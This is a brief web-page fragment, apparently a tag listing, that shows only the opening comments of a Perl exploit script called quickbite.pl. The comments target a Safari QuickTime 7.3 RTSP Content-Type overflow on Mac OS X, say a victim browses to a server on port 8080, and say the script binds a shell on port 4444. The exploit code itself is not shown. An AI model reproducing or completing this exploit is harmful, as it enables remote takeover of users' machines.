标签:victim
-
Safari Quicktime”
#!/usr/bin/perl## quickbite.pl## Safari Quicktime <= 7.3 RTSP Content-Type overflow exploit# for Mac OS X (Intel)## Tested with OS X 10.4.# On victim, browse to http://server:8080/# Binds shell on port 4444....